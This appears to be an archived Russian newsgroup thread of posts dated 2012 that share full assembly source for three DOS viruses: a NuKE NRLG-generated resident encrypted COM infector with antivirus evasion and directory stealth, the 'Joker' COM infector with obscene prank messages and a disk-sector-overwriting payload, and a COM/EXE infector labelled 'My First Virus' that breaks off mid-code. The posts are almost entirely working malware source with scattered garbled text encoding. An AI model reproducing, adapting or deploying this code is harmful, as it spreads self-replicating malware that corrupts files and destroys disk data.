Hу я вроде все сказал... Может еще что добавлю потом...
[√] Пока _All_ !

▌║▐║│║▌║││║║ DreamLand laboratory. P2Pirates<dog>Mail.ru ICQ 638-547-576
2║5080▌244║0 FTP://87.224.224.182

... Тиха украинская ночь, но САЛО надо перепрятать.

John Zaicev

unread,

May 13, 2012, 5:02:39 AM5/13/12

to

[–] ðÒÉ×ÅÔ _All_ !

; THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. [NuKE] PoWeR
; CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN [NuKE] WaReZ
; auToR: aLL [NuKE] MeMeBeRS [NuKE] PoWeR
; [NuKE] THe ReaL PoWeR! [NuKE] WaReZ
; NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994 [NuKE] PoWeR
;„€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€…

.286
code segment
assume cs:code,ds:code
org 100h

start: CALL NEXT

NEXT:
mov di,sp ;take the stack pointer location
mov bp,ss:[di] ;take the "DELTA HANDLE" for my virus
sub bp,offset next ;subtract the large code off this code
;
;*******************************************************************
; #1 DECRYPT ROUTINE
;*******************************************************************

cmp byte ptr cs:[crypt],0b9h ;is the first runnig?
je crypt2 ;yes! not decrypt
;----------------------------------------------------------
mov cx,offset fin ;cx = large of virus
lea di,[offset crypt]+ bp ;di = first byte to decrypt
mov dx,1 ;dx = value for decrypt
;----------------------------------------------------------
deci: ;deci = fuck label!
;----------------------------------------------------------

šsub byte ptr [di],07dh
add byte ptr [di],0d5h
not byte ptr [di]
add byte ptr [di],035h
sub byte ptr [di],022h
not byte ptr [di]
add byte ptr [di],034h
add byte ptr [di],012h
inc byte ptr [di]
sub byte ptr [di],0e8h
add word ptr [di],08522h
xor byte ptr [di],058h
inc word ptr [di]
šinc di
inc di
;----------------------------------------------------------
jmp bye ;######## BYE BYE F-PROT ! ##########
mov ah,4ch
int 21h
bye: ;#### HEY FRIDRIK! IS ONLY A JMP!!###
;-----------------------------------------------------------
mov ah,0bh ;######### BYE BYE TBAV ! ##########
int 21h ;### (CANGE INT AT YOU PLEASURE) ###
;----------------------------------------------------------
loop deci ;repeat please!
;
;*****************************************************************
; #2 DECRYPT ROUTINE
;*****************************************************************
;
crypt: ;fuck label!
;
mov cx,offset fin ;cx = large of virus
lea di,[offset crypt2] + bp ;di = first byte to decrypt
;---------------------------------------------------------------
deci2: ;
xor byte ptr cs:[di],1 ;decrytion rutine
inc di ;very simple...
loop deci2 ;
;---------------------------------------------------------------
crypt2: ;fuck label!
;
MOV AX,0CACAH ;call to my resident interrup mask
INT 21H ;for chek "I'm is residet?"
CMP Bh,0CAH ;is equal to CACA?
JE PUM2 ;yes! jump to runnig program
call action
;*****************************************************************
; NRLG FUNCTIONS (SELECTABLE)
;*****************************************************************

š;****************************************************************
; PROCESS TO REMAIN RESIDENT
;****************************************************************

mov ax,3521h
int 21h ;store the int 21 vectors
mov word ptr [bp+int21],bx ;in cs:int21
mov word ptr [bp+int21+2],es ;
;---------------------------------------------------------------
push cs ;
pop ax ;ax = my actual segment
dec ax ;dec my segment for look my MCB
mov es,ax ;
mov bx,es:[3] ;read the #3 byte of my MCB =total used memory
;---------------------------------------------------------------
push cs ;
pop es ;
sub bx,(offset fin - offset start + 15)/16 ;subtract the large of my virus
sub bx,17 + offset fin ;and 100H for the PSP total
mov ah,4ah ;used memory
int 21h ;put the new value to MCB
;---------------------------------------------------------------
mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin
mov ah,48h ;
int 21h ;request the memory to fuck DOS!
;---------------------------------------------------------------
dec ax ;ax=new segment
mov es,ax ;ax-1= new segment MCB
mov byte ptr es:[1],8 ;put '8' in the segment
;--------------------------------------------------------------
inc ax ;
mov es,ax ;es = new segment
lea si,[bp + offset start] ;si = start of virus
mov di,100h ;di = 100H (psp position)
mov cx,offset fin - start ;cx = lag of virus
push cs ;
pop ds ;ds = cs
cld ;mov the code
rep movsb ;ds:si >> es:di
;--------------------------------------------------------------
mov dx,offset virus ;dx = new int21 handler
mov ax,2521h ;
push es ;
pop ds ;
int 21h ;set the vectors
;-------------------------------------------------------------
pum2: ;
;
mov ah,byte ptr [cs:bp + real] ;restore the 3
mov byte ptr cs:[100h],ah ;first bytes
mov ax,word ptr [cs:bp + real + 1] ;
mov word ptr cs:[101h],ax ;
;-------------------------------------------------------------
mov ax,100h ;
jmp ax ;jmp to execute
;
;*****************************************************************
;* HANDLER FOR THE INT 21H
;*****************************************************************
;
VIRUS: ;
;
cmp ah,4bh ;is a 4b function?
je REPRODUCCION ;yes! jump to reproduce !
cmp ah,11h
je dir
cmp ah,12h
je dir
dirsal:
cmp AX,0CACAH ;is ... a caca function? (resident chek)
jne a3 ;no! jump to a3
mov bh,0cah ;yes! put ca in bh
a3: ;
JMP dword ptr CS:[INT21] ;jmp to original int 21h
ret ;
make db '[NuKE] N.R.L.G. AZRAEL'
dir:
jmp dir_s
;-------------------------------------------------------------
REPRODUCCION: ;
;
pushf ;put the register
pusha ;in the stack
push si ;
push di ;
push bp ;
push es ;
push ds ;
;-------------------------------------------------------------
push cs ;
pop ds ;
mov ax,3524H ;get the dos error control
int 21h ;interupt
mov word ptr error,es ;and put in cs:error
mov word ptr error+2,bx ;
mov ax,2524H ;change the dos error control
mov dx,offset all ;for my "trap mask"
int 21h ;
;-------------------------------------------------------------
pop ds ;
pop es ;restore the registers
pop bp ;
pop di ;
pop si ;
popa ;
popf ;
;-------------------------------------------------------------
pushf ;put the registers
pusha ;
push si ;HEY! AZRAEL IS CRAZY?
push di ;PUSH, POP, PUSH, POP
push bp ;PLEEEEEAAAAAASEEEEEEEEE
push es ;PURIFY THIS SHIT!
push ds ;
;-------------------------------------------------------------
mov ax,4300h ;
int 21h ;get the file
mov word ptr cs:[attrib],cx ;atributes
;-------------------------------------------------------------
mov ax,4301h ;le saco los atributos al
xor cx,cx ;file
int 21h ;
;-------------------------------------------------------------
mov ax,3d02h ;open the file
int 21h ;for read/write
mov bx,ax ;bx=handle
;-------------------------------------------------------------
mov ax,5700h ;
int 21h ;get the file date
mov word ptr cs:[hora],cx ;put the hour
mov word ptr cs:[dia],dx ;put the day
and cx,word ptr cs:[fecha] ;calculate the seconds
cmp cx,word ptr cs:[fecha] ;is ecual to 58? (DEDICATE TO N-POX)
jne seguir ;yes! the file is infected!
jmp cerrar ;
;------------------------------------------------------------
seguir: ;
mov ax,4202h ;move the pointer to end
call movedor ;of the file
;------------------------------------------------------------
push cs ;
pop ds ;
sub ax,3 ;calculate the
mov word ptr [cs:largo],ax ;jmp long
;-------------------------------------------------------------
mov ax,04200h ;move the pointer to
call movedor ;start of file
;----------------------------------------------------------
push cs ;
pop ds ;read the 3 first bytes
mov ah,3fh ;
mov cx,3 ;
lea dx,[cs:real] ;put the bytes in cs:[real]
int 21h ;
;----------------------------------------------------------
cmp word ptr cs:[real],05a4dh ;the 2 first bytes = 'MZ' ?
jne er1 ;yes! is a EXE... fuckkk!
;----------------------------------------------------------
jmp cerrar
er1:
;----------------------------------------------------------
mov ax,4200h ;move the pointer
call movedor ;to start fo file
;----------------------------------------------------------
push cs ;
pop ds ;
mov ah,40h ;
mov cx,1 ;write the JMP
lea dx,[cs:jump] ;instruccion in the
int 21h ;fist byte of the file
;----------------------------------------------------------
mov ah,40h ;write the value of jmp
mov cx,2 ;in the file
lea dx,[cs:largo] ;
int 21h ;
;----------------------------------------------------------
mov ax,04202h ;move the pointer to
call movedor ;end of file
;----------------------------------------------------------
push cs ;
pop ds ;move the code
push cs ;of my virus
pop es ;to cs:end+50
cld ;for encrypt
mov si,100h ;
mov di,offset fin + 50 ;
mov cx,offset fin - 100h ;
rep movsb ;
;----------------------------------------------------------
mov cx,offset fin
mov di,offset fin + 50 + (offset crypt2 - offset start) ;virus
enc: ;
xor byte ptr cs:[di],1 ;encrypt the virus
inc di ;code
loop enc ;
;---------------------------------------------------------
mov cx,offset fin
mov di,offset fin + 50 + (offset crypt - offset start) ;virus
mov dx,1
enc2: ;

šdec word ptr [di]
xor byte ptr [di],058h
sub word ptr [di],08522h
add byte ptr [di],0e8h
dec byte ptr [di]
sub byte ptr [di],012h
sub byte ptr [di],034h
not byte ptr [di]
add byte ptr [di],022h
sub byte ptr [di],035h
not byte ptr [di]
sub byte ptr [di],0d5h
add byte ptr [di],07dh
šinc di
inc di ;the virus code
loop enc2 ;
;--------------------------------------------
mov ah,40h ;
mov cx,offset fin - offset start ;copy the virus
mov dx,offset fin + 50 ;to end of file
int 21h ;
;----------------------------------------------------------
cerrar: ;
;restore the
mov ax,5701h ;date and time
mov cx,word ptr cs:[hora] ;file
mov dx,word ptr cs:[dia] ;
or cx,word ptr cs:[fecha] ;and mark the seconds
int 21h ;
;----------------------------------------------------------
mov ah,3eh ;
int 21h ;close the file
;----------------------------------------------------------
pop ds ;
pop es ;restore the
pop bp ;registers
pop di ;
pop si ;
popa ;
popf ;
;----------------------------------------------------------
pusha ;
;
mov ax,4301h ;restores the atributes
mov cx,word ptr cs:[attrib] ;of the file
int 21h ;
;
popa ;
;----------------------------------------------------------
pushf ;
pusha ; 8-( = f-prot
push si ;
push di ; 8-( = tbav
push bp ;
push es ; 8-) = I'm
push ds ;
;----------------------------------------------------------
mov ax,2524H ;
lea bx,error ;restore the
mov ds,bx ;errors handler
lea bx,error+2 ;
int 21h ;
;----------------------------------------------------------
pop ds ;
pop es ;
pop bp ;restore the
pop di ;resgisters
pop si ;
popa ;
popf ;
;----------------------------------------------------------
JMP A3 ;jmp to orig. INT 21
;
;**********************************************************
; SUBRUTINES AREA
;**********************************************************
;
movedor: ;
;
xor cx,cx ;use to move file pointer
xor dx,dx ;
int 21h ;
ret ;
;----------------------------------------------------------
all: ;
;
XOR AL,AL ;use to set
iret ;error flag

;***********************************************************
; DATA AREA
;***********************************************************
largo dw ?
jump db 0e9h
real db 0cdh,20h,0
hora dw ?
dia dw ?
attrib dw ?
int21 dd ?
error dd ?

š;---------------------------------
action: ;Call label
MOV AH,2AH ;
INT 21H ;get date
CMP Dl,byte ptr cs:[action_dia+bp] ;is equal to my day?
JE cont ;nop! fuck ret
cmp byte ptr cs:[action_dia+bp],32 ;
jne no_day ;
cont: ;
cmp dh,byte ptr cs:[action_mes+bp] ;is equal to my month?
je set ;
cmp byte ptr cs:[action_mes+bp],13 ;
jne NO_DAY ;nop! fuck ret
set: ;
mov AH,9 ;yeah!!
MOV DX,OFFSET PAO ;print my text!
INT 21H ;now!
INT 20H ;an finsh te program
NO_DAY: ;label to incorrect date
ret ;return from call
;---------------------------------

PAO:
DB 10,13,'you are infected with john virus ver 1.0a','$'

;*****************************************************
dir_s:
pushf
push cs
call a3 ;Get file Stats
test al,al ;Good FCB?
jnz no_good ;nope
push ax
push bx
push es
mov ah,51h ;Is this Undocmented? huh...
int 21h
mov es,bx
cmp bx,es:[16h]
jnz not_infected
mov bx,dx
mov al,[bx]
push ax
mov ah,2fh ;Get file DTA
int 21h
pop ax
inc al
jnz fcb_okay
add bx,7h
fcb_okay: mov ax,es:[bx+17h]
and ax,1fh ;UnMask Seconds Field
xor al,byte ptr cs:fechad
jnz not_infected
and byte ptr es:[bx+17h],0e0h
sub es:[bx+1dh],OFFSET FIN - OFFSET START ;Yes minus virus
size
sbb es:[bx+1fh],ax
not_infected:pop es
pop bx
pop ax
no_good: iret
;********************************************************************
; THIS DIR STEALTH METOD IS EXTRAC FROM NUKEK INFO JOURNAL 4 & N-POX
;*********************************************************************

šaction_dia Db 08H ;day for the action
action_mes Db 04H ;month for the action
FECHA DW 01eH ;Secon for mark
FECHAd Db 01eH ;Secon for mark dir st
fin:
code ends
end start

HÕ Ñ ×ÒÏÄÅ ×ÓÅ ÓËÁÚÁÌ... íÏÖÅÔ ÅÝÅ ÞÔÏ ÄÏÂÁ×ÌÀ ÐÏÔÏÍ...
[–] ðÏËÁ _All_ !

Ž¡ ¡ ¡Ž¡ ¡¡ DreamLand laboratory. P2Pirates<dog>Mail.ru ICQ 638-547-576
2¡5080Ž244¡0 FTP://87.224.224.182

... úÁ Ä×ÕÍÑ ÚÁÊÃÁÍÉ ÐÏÇÏÎÉÛØÓÑ - ÎÁ ÔÏÐÏÒ ÎÁÏÐÒÉÛÓÑ.

John Zaicev

unread,

May 13, 2012, 5:03:15 AM5/13/12

to

[√] Привет _All_ !

title " Joker! virus. Written by The BOOT SECTOR Infector ... "
;
; Joker - This is a remake of the deceased "Joker/Jocker" virus. The original
; had multiple programming errors in it that kept it from replicating.
; My version is much more successful.
;

page 255,80
code segment word public 'code'

assume cs:code,ds:code
org 100h

main proc;edure

;EQUates...
idc equ 69h ;ID character - (note: 69)
cr equ 13 ;ASCII for carriage return
lf equ 10 ;ASCII for line feed

;End codes. These determine what happens after the string is displayed.

terminate equ 0 ;Terminate program after display
halt equ 1 ;Cause the system to hang after display
SimulateCritErr equ 2 ;Simulate the critical error handler
return2host equ 3 ;Resume program immediately
FlashFloppy equ 4 ;Wait for a key, then reset Drive A:
WaitKey equ 5 ;Wait for a key, then resume program
PauseKey equ 6 ;Same thing, but uses a pause message
StackError equ 7 ;Cause a stack overflow (halts system)

tof: ;Top-Of-File
jmp begin ;Skip over program
idchar: db idc ;ID character

HostProgram: nop ;First run copy only!
nop ;First run copy only!

first_four: nop ;First run copy only!
address: int 20h ;First run copy only!
check: nop ;First run copy only!

begin: call nextline ;Push IP+3 onto stack
nextline: pop bp ;mov bp,ip
sub bp,offset nextline ;bp=disp. for mem locs

push ax ;Save AX
call cryptor ;Decrypt
jmp short retloc ;Continue program

cryptor: mov al,[bp+offset encrypt_val] ;encrypt val
lea si,[bp+offset toec] ;Top Of Encrypted Code
mov cx,offset eoec-offset toec ;Length of " "
cryptorloop: xor [si],al ;en/de crypt
rol al,cl ;change code #
inc si ;Next char please!
loop cryptorloop ;loop if necessary
ret ;Return to caller

infect: call cryptor ;Encrypt code
pop cx ;Restore CX for INT 21
int 21h ;Call DOS
call cryptor ;Decrypt code
ret ;Go back

toec:;ДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДTop Of Encrypted Code
InfectIt: push cx ;Save CX for sub
jmp infect

retloc: pop ax ;Restore AX
xor di,di ;DI = 0

cli ;Disable interrupts
mov ss,di ;Set up stack at:
mov sp,2F0h ; 0000:02F0
sti ;Enable interrupts

mov si,96h ;Vector for INT 24h
mov bx,ss:[si] ;BX = offset in segment
mov cx,ss:[si+2] ;CX = segment
lea dx,[bp+offset int24handler] ;CS:DX -} local handler
mov ss:[si],DX ;Save offset
mov ss:[si+2],cs ;Save segment
mov si,es:[di+2F8h] ;Check operation mode
cmp si,4643h ;'CF' if already TSRed
jne GoOn ;Nope, jmp
jmp return ;Yes, don't do anything

GoOn: mov cs:[di+4Ch],bx ;use unused part of PSP
mov cs:[di+4Eh],cx ; to save BX and CX
push cs ;Copy CS ...
pop es ; ... to DS

mov byte ptr [bp+offset infected],0 ;Reset infection count
mov byte ptr [bp+offset max2kill],3 ;Stop after 3 or less

GoOn2: lea si,[bp+offset first_four] ;Original first 4 bytes
mov di,offset tof ;TOF never changes
cld ;Read left-to-right
movsw ;Copy the 4 bytes
movsw ;Copy the 4 bytes

mov ah,1Ah ;Set DTA address ...
lea dx,[bp+offset DTA] ; ... to *our* DTA
int 21h ;Call DOS to set DTA

mov ah,4Eh ;Find First ASCIIZ
lea dx,[bp+offset filespec] ;DS:DX -} '*.COM',0
lea si,[bp+offset filename] ;Point to file
push dx ;Save DX
jmp short continue ;Continue...

return: mov ah,1ah ;Set DTA address ...
mov dx,80h ; ... to default DTA
int 21h ;Call DOS to set DTA
xor di,di ;DI= 0
mov es,di ;ES= 0
mov si,96h ;Vector for INT 24h
mov bx, cs:[di+4Ch] ;Restore from saved BX
mov word ptr es:[si+0], bx ;Place back into vector
mov cx, cs:[di+4Eh] ;Restore from saved CX
mov word ptr es:[si+2], cx ;Place back into vector
push cs ;Move CS ...
pop es ; ... to ES

mov ax,[bp+offset SavedAX] ;Restore AX
xor bx,bx ;BX= 0
mov cx,bx ;CX= 0
mov dx,cx ;DX= 0
mov si,dx ;SI= 0
mov di,si ;DI= 0
mov sp,0FFFEh ;SP= FFFEh (normal)
mov bp,100h ;BP= 100h (RETurn addr)
push bp ; Put on stack
mov bp,ax ;BP= 0
ret ;JMP to 100h

nextfile: or bx,bx ;Did we open the file?
jz skipclose ;No, so don't close it
mov ah,3Eh ;Close file
int 21h ;Call DOS to close it
xor bx,bx ;Set BX back to 0
skipclose: mov ah,4Fh ;Find Next ASCIIZ

continue: pop dx ;Restore DX
push dx ;Re-save DX
xor cx,cx ;CX= 0
xor bx,bx
int 21h ;Find First/Next
jnc skipjmp
jmp NoneLeft ;Out of files

skipjmp: mov ax,3D02h ;open file
mov dx,si ;point to filespec
int 21h ;Call DOS to open file
jc nextfile ;Next file if error

mov bx,ax ;get the handle
mov ah,3Fh ;Read from file
mov cx,4 ;Read 4 bytes
lea dx,[bp+offset first_four] ;Read in the first 4
int 21h ;Call DOS to read

cmp byte ptr [bp+offset check],idc ;Already infected?
je nextfile ;Yep, try again ...
;NOTE: Delete the two lines above if you want it to re-infected programs.

cmp byte ptr [bp+offset first_four],77 ;Mis-named .EXE?
je nextfile ;Yep, maybe next time!

mov ax,4202h ;LSeek to EOF
xor cx,cx ;CX= 0
xor dx,dx ;DX= 0
int 21h ;Call DOS to LSeek

cmp ah,0F8h ;Longer than 62K?
ja nextfile ;Yep, try again...
mov [bp+offset addr],ax ;Save call location

mov ah,40h ;Write to file
mov cx,4 ;Write 4 bytes
lea dx,[bp+offset first_four] ;Point to buffer
int 21h ;Save the first 4 bytes

mov ah,[bp+offset encrypt_val] ;Get code number
inc ah ;add 1
adc ah,0 ;increment if it's zero
mov [bp+offset encrypt_val],ah ;Save new code number

mov ah,40h ;Write to file
mov cx,offset eof-offset begin ;Length of target code
lea dx,[bp+offset begin] ;Point to virus start
call InfectIt ;Exempt from encryption
ComeBackHere: mov ax,4200h ;LSeek to TOF
xor cx,cx ;CX= 0
xor dx,dx ;DX= 0
int 21h ;Call DOS to LSeek

mov ax,[bp+offset addr] ;Retrieve location
inc ax ;Adjust location

mov [bp+offset address],ax ;address to call
mov byte ptr [bp+offset first_four],0E9h ;JMP rel16 inst.
mov byte ptr [bp+offset check],idc ;EOFMARK

mov ah,40h ;Write to file
mov cx,4 ;Write 4 bytes
lea dx,[bp+offset first_four] ;4 bytes are at [DX]
int 21h ;Write to file

inc byte ptr [bp+offset infected] ;increment counter
dec byte ptr [bp+offset max2kill] ;decrement counter
jz TheEnd ;If 0 then End

inc byte ptr [bp+offset encrypt_val] ;change code #
adc byte ptr [bp+offset encrypt_val],0 ;adjust if 0
jmp nextfile ;Next victim!

NoneLeft: cmp byte ptr [bp+offset infected],3 ;At least 3 infected?
jae TheEnd ;The party's over!

mov di,100h ;DI= 100h
cmp word ptr [di],20CDh ;an INT 20h?
je TheEnd ;Don't go to prev. dir.

lea dx,[bp+offset prevdir] ;'..'
mov ah,3Bh ;Set current directory
int 21h ;CHDIR ..
jc TheEnd ;We're through!
mov ah,4Eh
jmp continue ;Start over in new dir

TheEnd: xor di,di ;DI= 0
mov es,di ;ES= 0
mov ah,2ah ;Get date
int 21h ;Do it
cmp dl,4 ;4th of the month?
jne test2 ;Nope, second test
cmp dh,7 ;July?
jne test2 ;Nope, second test
xor ax,ax ;Sector 0
jmp Kill ;Kill the disk now...

test2: mov ah,2ch ;Get time
int 21h ;Do it
or cl,cl ;On the hour? (x:00 xM)
jnz GiveUp ;Return to program
cmp ch,6 ;Midnight to 5 AM ???
jnl GiveUp ;Return to program
add cl,ch ;Add first number
mov ax,cx ;Transfer to AX
cbw ;Zero out AH
add al,dh ;Add DL to AL
adc al,dl ;Add DL and carry flag
adc ah,0 ;Add carry to AH
or ax,ax ;AX = 0 ???
jnz Kill ;Kill the disk now...
inc ax ;Well, adjust first...

Kill: mov dx,ax ;Sector number
mov cx,1 ;One at a time....
xor bx,bx ;Point at PSP
mov ah,19h ;Get current disk
int 21h ;Call DOS to ^
int 26h ;Now kill the disk

GiveUp: mov bx,offset message_table ;point to table

mov ah,2ch ;Get time
int 21h ;Call DOS to ^
inc dh ;(0-59)

timeloop: cmp dh,msgs ;mapped yet?
jl timedone ;Yes, jump
sub dh,msgs ;try to map it
jmp short timeloop ;and check out work

timedone: mov al,dh ;AL gets msg #
mov cl,al ;Save in CL for CritErr
cbw ;AH gets 0
shl ax,1 ;AX = AX * 2
add bx,ax ;BX = index
mov si,[bx] ;SI points to string
mov ch,[si-1] ;CH is technique #
mov dx,si ;DX points to string

mov ah,9 ;Display string
int 21h ;Call DOS to ^

cmp ch,terminate ;Terminate program?
je TerminateProg ;Nope, next test

cmp ch,halt ;Halt program?
je $ ;Hang system if ch=halt

cmp ch,SimulateCritErr ;Simulate CritErr?
je simulate ;yes, go do it

cmp ch,Return2host ;Return to host?
je ResumeProgram ;yes, go do it

cmp ch,FlashFloppy ;Flash drive A:?
je FlashFlop ;Yes, go do it

cmp ch,WaitKey ;Wait for keypress?
je zwait ;Yes, go do it

cmp ch,PauseKey ;Pause message w/ wait?
je zpause ;Yes, go do it

cmp ch,StackError ;Stack overflow?
je StackErr ;Yes, go do it

;Invalid code, assume Return2host

ResumeProgram: jmp return ;Return to caller
StackErr: call $ ;Cause stack overflow
TerminateProg: int 20h ;Yep, all done!

simulate: lea dx,[bp+offset ARIFmsg] ;Abort, Retry ...
mov ah,9 ;Print string
int 21h ;Call DOS to ^

mov ah,1 ;Input a char
int 21h ;Call DOS to ^

lea dx,[bp+offset crlf] ;crlf
mov ah,9 ;Print string
int 21h ;Call DOS to ^

cmp al,'a' ;Uppercase?
jb uppercase ;Nope, jump
sub al,' ' ;Yes, make uppercase

uppercase: cmp al,'A' ;Abort?
je terminateprog ;Yep, go do it.

cmp al,'R' ;Retry?
jne zskip ;skip over "retry" code

lea dx,[bp+offset crlf] ;Point to crlf
mov ah,9 ;Print string
int 21h ;Call DOS to ^
mov dh,cl ;Restore DH from CL
jmp timedone ;Reprint error

zskip: cmp al,'I' ;Ignore?
je ResumeProgram ;Return to host program
cmp al,'F' ;Fail?
jne simulate ;Invalid response

lea dx,[bp+offset fail24] ;Point to fail string
mov ah,9 ;Print string
int 21h ;Call DOS to ^
int 20h ;Terminate program

FlashFlop: mov ah,1 ;Wait for keypress
int 21h ;Call DOS to ^

xor ax,ax ;Drive A:
mov cx,1 ;Read 1 sector
mov dx,ax ;Start at boot sector
lea bx,[bp+offset boot_sector] ;BX points to buffer
int 25h ;Flash light on A:
jmp short ResumeProgram ;Resume if no error

zpause: lea dx,[bp+offset pause] ;Point to pause message
mov ah,9 ;Print string
int 21h ;Call DOS to ^
zwait:
mov ah,1 ;Wait for keypress
int 21h ;Call DOS to ^
jmp short ResumeProgram ;Go on...

ARIFmsg db cr,lf,'Abort, Retry, Ignore, Fail?$'
fail24 db cr,lf,cr,lf,'Fail on INT 24'
crlf db cr,lf,'$'

message_table:
dw offset msg1
dw offset msg2
dw offset msg3
dw offset msg4
dw offset msg5
dw offset msg6
dw offset msg7
dw offset msg8
dw offset msg9
dw offset msg10
dw offset msg11
dw offset msg12
dw offset msg13
dw offset msg14
dw offset msg15
dw offset msg16
dw offset msg17
dw offset msg18
dw offset msg19
dw offset msg20

msgs db 20

; I tried to make it as simple as possible to change the messages
; and add/delete them. Each message is in the format:
;
; db [technique]
;[label] db [Text]
;
; Where [technique] is one of the 8 codes shown at the beginning of
; this file (terminate, halt, etc.). This determines what the virus
; should do after printing the message.
; [label] is in the form "msg##" where ## is a number from 1 to
; "msgs". "msgs" is defined immediately before this
; comment block.
; [text] is a combination of text and ASCII codes, terminated by
; either a '$' or a ,36.
;
; If you change the number of messages the virus has, you should also
; add/remove lines from the offset table and change the "msgs"
; data byte appropriately. Let's say for instance that you want
; to remove "Program too big to fit in memory.":
; 1) Delete the line(s) with the message and the line
; immediately before it.
; 2) Move message #20 up to message #2's position and
; change its label from "msg20" to "msg2".
; 3) Delete the line "dw offset msg20" from the offset
; table.
; 4) Change the line before this comment block to:
; "msgs db 19"
;
; Later!
; -The BOOT SECTOR Infector ...
;

db FlashFloppy ;Waits for key, then flashes drive A:
msg5 db 'I',39,'m hungry! Insert PIZZA & BEER into drive A: and',cr,lf
pause db 'Strike any key when ready... $'

db SimulateCritErr ;Prints ARIF message and responds appropriately
msg1 db 'Impotence error reading user',39,'s dick$'

db terminate ;Ends the program immediately
msg2 db 'Program too big to fit in memory',cr,lf,'$'

db halt ;Halts the system
msg3 db 'Cannot load COMMAND, system halted',cr,lf,'$'

db terminate ;Ends the program immediately
msg4 db 'I',39,'m sorry, Dave.... but I',39,'m afraid'
db ' I can',39,'t do that!',cr,lf,'$'

db WaitKey ;Waits for a keypress, then runs the program
msg6 db 'Format another? (Y/N)? $'

db StackError ;Generates a stack overflow (halts the system)
msg7 db 'Damn it! I told you not to touch that!$'

db terminate ;Ends the program immediately
msg8 db 'Suck me!',cr,lf,'$'

db SimulateCritErr ;Prints ARIF message and responds appropriately
msg9 db 'Cocksucker At Keyboard error reading device CON:$'

db terminate ;Ends the program immediately
msg10 db 7,cr,cr,cr,7,cr,cr,cr,7,cr,cr,cr,lf
db 'I',39,'m sorry, but your call cannot be completed as dialed.'
db cr,lf,'Please hang up & try your call again.',cr,lf,'$'

db terminate ;Ends the program immediately
msg11 db 'No!',cr,lf,cr,lf,'$'

db halt ;Halts the system
msg12 db 'Panic kernal mode interrupt$'

db WaitKey ;Waits for a keypress, then runs the program
msg13 db 'CONNECT 1200<',cr,lf,cr,lf,'$'

db return2host ;Runs host program immediately
msg14 db 'Okay, okay! Be patient! ...',cr,lf,'$'

db terminate ;Ends the program immediately
msg15 db 'And if I refuse?',cr,lf,'$'

db return2host ;Runs host program immediately
msg16 db 'Fuck the world and its followers!',cr,lf,'$'

db return2host ;Runs host program immediately
msg17 db 'You are pathetic, man... you know that?',cr,lf,'$'

db terminate ;Ends the program immediately
msg18 db 'Cum on! Talk DIRTY to me !!!',cr,lf,'$'

db terminate ;Ends the program immediately
msg19 db 'Your coprocessor wears floppy disks!',cr,lf,'$'

db PauseKey ;Waits for keypress (SAKWR), then runs host prg
msg20 db 'Joker! ver аа by TBSI!',cr,lf
db 'Remember! EVERYTHING',39,'s bigger in Texas!',cr,lf,'$'

int24handler: xor al,al ;Ignore the error
iret ;Interrupt return

filespec: db '*.COM',0 ;File specification
prevdir: db '..',0 ;previous directory
max2kill db 3 ;max. files to infect

eoec:;ДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДEnd Of Encrypted Code
VersionNumber dw 100h ;Version 1.00
encrypt_val db 0 ;1st-run copy only

; None of this information is included in the virus's code. It is only used
; during the search/infect routines and it is not necessary to preserve it
; in between calls to them.

eof:
DTA:

db 21 dup (?) ;internal search's data
attribute db ? ;attribute
file_time db 2 dup (?) ;file's time stamp
file_date db 2 dup (?) ;file's date stamp
file_size db 4 dup (?) ;file's size
filename db 13 dup (?) ;filename

SavedAX dw ? ;Used to save AX
infected db ? ;infection count
addr dw ? ;Address

boot_sector:

main endp;rocedure
code ends;egment

end main

Hу я вроде все сказал... Может еще что добавлю потом...
[√] Пока _All_ !

▌║▐║│║▌║││║║ DreamLand laboratory. P2Pirates<dog>Mail.ru ICQ 638-547-576
2║5080▌244║0 FTP://87.224.224.182

... Лети с приветом, вернись умным.

John Zaicev

unread,

May 13, 2012, 5:02:58 AM5/13/12

to

[–] ًزة×إش _All_ !

;******************************************************************
;* *
;* My First Virus, a simple non-overwriting COM and EXE *
;* infector. *
;* by, Joshua *
;* *
;******************************************************************

ID = 'SS' ; My ID

.model tiny ; Memory model
.code ; Start Code
org 100h ; Start of COM file

MAIN: db 0e9h,00h,00h ; Jmp START_VIRUS

START proc near

DECRYPT: mov bx,offset START_VIRUS ; Find out our offset
mov cx,(END_VIRUS-START_VIRUS)/2
DECRYPT_LOOP: db 2eh,81h,37h ; XOR [BX],xxxx
KEY dw 0 ; Crypt KEY
add bx,2 ; Increment offset
dec cx ; Decrement counter
jnz DECRYPT_LOOP ; Continue until done

START_VIRUS:
call FIND_OFFSET ; Real start of virus

; Calculate change in offset from host program.

FIND_OFFSET: pop bp ; BP holds current IP
sub bp, offset FIND_OFFSET ; Calculate net change
; Change BP to start of
; virus code

; Capture INT 24h Critical error handler.

push es ; Save ES
mov ax,3524h ; DOS get interupt vector
int 21h ; Call DOS to do it
mov word ptr [bp+OLDINT24],bx ; Save old INT 24h
mov word ptr [bp+OLDINT24+2],es ; vector
mov ah,25h ; DOS set interupt vector
lea dx,[bp+NEWINT24] ; Address of new interupt
int 21h ; Call DOS to do it
pop es ; Restore ES

; Find out what kind of program I am, COM or EXE, by checking stack pointer.
; This is where I store my ID in an EXE infection.

cmp sp,ID ; COM or EXE?
je RESTORE_EXE ; I am an EXE file

; Restore original bytes to the COM program.

RESTORE_COM: lea si,[bp+COM_START] ; Restore original 3 bytes
mov di,100h ; to 100h, start of file
push di ; Jmp to 100h when done
movsw ; Copy 3 bytes
movsb
jmp short RESTORE_DONE

; Restore original bytes to the EXE program.

RESTORE_EXE: push ds ; Save original DS
push es ; Save original ES
push cs ; Set DS = CS
pop ds
push cs ; Set ES = CS
pop es
lea si,[bp+JMPSAVE] ; Copy original CS:IP and
lea di,[bp+JMPSAVE2] ; SS:SP for return
movsw ; Copy 8 bytes
movsw
movsw
movsw

; Change the DTA from the default so FINDFIRST/FINDNEXT won't destroy
; original command line parameters.

RESTORE_DONE: lea dx,[bp+DTA] ; Point to new DTA area
mov ah,1ah ; DOS set DTA
